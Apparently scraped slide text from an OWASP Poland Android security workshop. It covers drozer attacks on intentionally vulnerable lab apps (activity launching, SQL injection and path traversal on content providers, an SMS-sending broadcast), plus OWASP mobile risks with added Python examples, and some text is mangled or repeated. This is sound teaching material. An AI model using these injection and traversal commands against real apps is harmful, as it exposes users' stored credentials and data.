Open-source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (i.e. by an attacker), it can be abused
• By launching it with crafted Intents it is possible to:
– modify data in the background
– trick the user
– leak sensitive information
Activities
Activity components attacks
• General hijacking scheme (figure: A → E → B, the malicious activity E receives the Intent that app A meant for the legitimate activity B)
• Results of an attack:
– a malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
– spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activities
Activity components attacks
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components – demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although services generally don't seem dangerous, they can perform sensitive operations.
To attack a service one needs an interaction point: it must be exported, or accept input from message formats like Intents, files or the network stack.
Services
Services attacks
Typical attacks: denial of service and information leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off Intents and watch what comes back
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on our device
Content providers
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions:
dz> run app.provider.info --permission null
Content providers
Content providers attacks
• Unrestricted access to the app database
– just query it: dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors might include altering data, e.g. using the app.provider.insert command
Content providers
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
Content providers
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
Content providers
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
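To see why --projection "* FROM Key--" works and what the fix looks like, here is an added example (mine, not Sieve's code and not from the slides) that models a provider's query() in Python against an in-memory SQLite database with constructed rows: the naive version pastes the caller's projection and selection into the SQL string, the hardened version whitelists columns and binds the selection value. The same block covers the "SQL injection into the local db" item of the OWASP top-10 part. On Android the hardened path corresponds to SQLiteQueryBuilder.setProjectionMap() plus setStrict(true) and binding selectionArgs; a provider that is not meant to be public should additionally carry android:exported="false" or a signature-level permission.

```python
import sqlite3

# Added example, not workshop code: a naive and a hardened content-provider
# query() side by side, run against a constructed Sieve-shaped database.

def open_demo_db():
    """In-memory database with tables shaped like Sieve's (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Key VALUES ('thisismypassword', '9876');
        INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
        INSERT INTO Passwords VALUES (2, 'Bank',  'alice', X'CAFEBABE', 'alice@example.com');
    """)
    return db

def vulnerable_query(db, projection=None, selection=None):
    """query(uri, projection, selection, ...) the way a naive provider builds it: by concatenation."""
    columns = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % columns
    if selection:
        sql += " WHERE (%s)" % selection          # caller-controlled SQL fragment
    return db.execute(sql).fetchall()

ALLOWED_COLUMNS = ("_id", "service", "username")  # the password column is never exposed over IPC

def hardened_query(db, projection=None, service=None):
    """Same contract, but the projection is whitelisted and the only filter is a bound parameter."""
    columns = tuple(projection) if projection else ALLOWED_COLUMNS
    unknown = [c for c in columns if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % unknown)
    sql = "SELECT %s FROM Passwords" % ", ".join(columns)   # only whitelisted identifiers reach the SQL
    params = ()
    if service is not None:
        sql += " WHERE service = ?"
        params = (service,)                       # value is bound, never spliced into the statement
    return db.execute(sql, params).fetchall()

def try_query(fn, *args, **kwargs):
    """Run a query function and return ('ok', rows) or ('error', message) instead of raising."""
    try:
        return "ok", fn(*args, **kwargs)
    except (sqlite3.Error, ValueError) as e:
        return "error", str(e)
```

The first assertion below is the drozer output above reproduced: the comment token turns "SELECT * FROM Key-- FROM Passwords" into a query against a different table. The hardened version refuses the identifier before any SQL is built, and a selection value containing quotes is just a string that matches no row.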
Content providers attacks
• Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers – demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: no authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Broadcast receivers
Broadcast receivers attacks
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // recipient and text come straight from the broadcast; nothing checks who sent it
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
The code above determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action
Broadcast receivers
Broadcast receivers attacks
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all the above-mentioned items:
• Set the android:exported attribute to false (then only components running under the same user ID as the current app can access the component)
• Limit access with permissions on the component (android:permission), e.g. RECEIVE_SMS or a custom app-defined permission with protectionLevel="signature"
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– plain-text configuration files
– cookie stores
– the SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
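The "monitor changes before and after" step, as an added example (mine, not from the slides): snapshot a directory tree, exercise the app, snapshot again, and diff the two, flagging new or modified files, files whose mode bits let other users read them, and files whose content contains obvious secret markers. Run it on a pulled copy of /data/data/<package> (adb pull) or directly on a rooted device; the before/after fixture built by run_demo() is constructed so the block runs offline, and the marker list is my choice.

```python
import hashlib
import os
import stat
import tempfile

# Added example, not workshop code: before/after diff of an app's data directory.
# Note: on /sdcard (FUSE/sdcardfs) mode bits are synthesized and mean little;
# the world-readable check is meaningful for /data/data/<package>.

def _digest(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def snapshot(root):
    """Map relative path -> (size, permission bits, sha256) for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue                       # skip symlinks, sockets, etc.
            rel = os.path.relpath(full, root)
            result[rel] = (st.st_size, stat.S_IMODE(st.st_mode), _digest(full))
    return result

def diff_snapshots(before, after):
    """Return (added, modified, removed) as sorted lists of relative paths."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return added, modified, removed

def world_readable(snap):
    """Paths whose mode grants read to 'other' (what MODE_WORLD_READABLE produces)."""
    return sorted(p for p, (_size, mode, _h) in snap.items() if mode & stat.S_IROTH)

SENSITIVE_MARKERS = (b"password", b"passwd", b"token", b"secret", b"begin private key")

def grep_sensitive(root, paths):
    """Among the given relative paths, those whose content contains a sensitive marker."""
    hits = []
    for rel in paths:
        with open(os.path.join(root, rel), "rb") as f:
            data = f.read().lower()
        if any(m in data for m in SENSITIVE_MARKERS):
            hits.append(rel)
    return hits

def report(root, before, after):
    added, modified, removed = diff_snapshots(before, after)
    return {
        "added": added, "modified": modified, "removed": removed,
        "world_readable": world_readable(after),
        "sensitive": grep_sensitive(root, added + modified),
    }

def run_demo(root=None):
    """Build a constructed before/after fixture in a temp directory and return the report."""
    root = root or tempfile.mkdtemp(prefix="appdata_")

    def write(rel, data, mode):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
        os.chmod(full, mode)

    write("shared_prefs/settings.xml", b'<map><string name="theme">dark</string></map>', 0o600)
    before = snapshot(root)
    # "after running the app": a world-readable prefs file holding a token, a log with a
    # password in it, and a changed settings file (all constructed sample data)
    write("shared_prefs/auth.xml", b'<map><string name="token">eyJhbGciOiJIUzI1NiJ9.fake</string></map>', 0o644)
    write("files/debug.log", b"user logged in, password=hunter2", 0o600)
    write("shared_prefs/settings.xml", b'<map><string name="theme">light</string></map>', 0o600)
    after = snapshot(root)
    return report(root, before, after)

if __name__ == "__main__":
    for key, paths in run_demo().items():
        print("%-15s %s" % (key, paths))
```

Everything in "added" and "modified" is what the app wrote while you used it; the "sensitive" hits are the files to open first, and anything in "world_readable" is a finding on its own regardless of content.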
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Encrypt local storage (note that DevicePolicyManager.setStorageEncryption() only requests device-level storage encryption and needs device-admin rights; it does not protect individual app files from other processes on a running device)
• For databases, consider SQLCipher for SQLite data encryption
• Ensure no shared preferences (or files) are created with MODE_WORLD_READABLE or MODE_WORLD_WRITEABLE (both deprecated since API 17)
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – another application via intent/content provider
  – a shared file
  – a server response
  – a third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
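A server-side session store that follows the four mitigations above, as an added example (not code from the talk): tokens come from a CSPRNG rather than the device ID, sessions expire after an idle timeout, the server can invalidate a token, and every token a user holds is destroyed when the authentication state changes. The 30-minute timeout and the 32-byte token length are assumptions.

```python
"""Server-side session handling following the M9 mitigations: CSPRNG tokens,
idle expiry, server-side invalidation, and teardown on auth-state change.
Added example, stdlib only; timeout and token length are assumed values."""
import secrets
import time

IDLE_TIMEOUT_SECONDS = 30 * 60   # assumed; tune to the app's real usage pattern


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock            # injectable so expiry can be tested offline
        self._sessions = {}            # token -> {"user": ..., "last_seen": ...}

    def create(self, user_id):
        """Issue a fresh high-entropy token (32 random bytes, URL-safe text).
        Nothing about the device or the user is derivable from it."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user_id, "last_seen": self._clock()}
        return token

    def resolve(self, token):
        """Return the user for a live token, or None. An expired token is
        deleted on sight, so a copied cookie cannot be replayed later."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if self._clock() - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]
            return None
        entry["last_seen"] = self._clock()   # sliding idle window
        return entry["user"]

    def invalidate(self, token):
        """Server-side logout: the client keeping the cookie gains nothing."""
        self._sessions.pop(token, None)

    def on_auth_change(self, user_id):
        """Password change, privilege change or switch to another user:
        drop every session this user holds and hand back one new token."""
        stale = [t for t, e in self._sessions.items() if e["user"] == user_id]
        for tok in stale:
            del self._sessions[tok]
        return self.create(user_id)

    def live_count(self):
        return len(self._sessions)
```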
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → Java
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → Smali
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik byte code (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application Framework
• Activity Manager: manages the activity life cycle of applications
• Content Providers: manage the data sharing between applications
• Telephony Manager: manages all voice calls
• Location Manager: location management using GPS or cell towers
• Resource Manager: manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install time security decisions
• Android 6.0 Security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers
Google Play
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
• By default only Google Play and other pre-installed app stores are allowed to install apps
• The vast majority of installs come from Google Play
Verify Apps
• Apps are verified prior to install
• Warn for or block Potentially Harmful Applications
• Over 10 million installs verified every day
• Verifying is on and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
(diagram: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Example components attributes (diagram: Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
  – modify data in the background
  – trick the user
  – leak sensitive information
Activities
Activity components attacks
• General hijacking scheme (diagram: A, B, E)
• Results of an attack:
  – a malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activities
Activity components attacks
• List and launch exported activities:
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations
To attack a service one needs interaction (it must be exported or respond to/accept input from message formats like intents, files or the network stack)
Services
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
Content providers
Content providers attacks
• Unrestricted access to the app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
Content providers
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
Content providers
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
Content providers attacks
• Path traversal
Content providers
